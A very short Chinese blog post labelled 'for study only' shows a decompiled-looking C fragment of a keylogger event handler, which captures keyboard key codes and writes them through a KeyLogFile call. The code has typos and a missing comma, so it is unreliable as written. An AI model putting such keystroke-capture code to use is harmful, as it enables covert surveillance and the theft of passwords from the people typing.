NexoGuard 仅供学习
2023-09-15 16:05 作者:ENDMOOOOON | 我要投稿
int __cdec1 MonitorHandler(int a1, int a2) { int v1; int v2; if (GetEventClass(a2) == 'keyb' ) { v1 = GetEventKind (a2); switch(v1) { case 1: GetEventParamter (a2, 'kcod' , 'magn' , 0 , 2 , 0 &v2); KeyLogFile (1,3,v2); break; } } return 0; }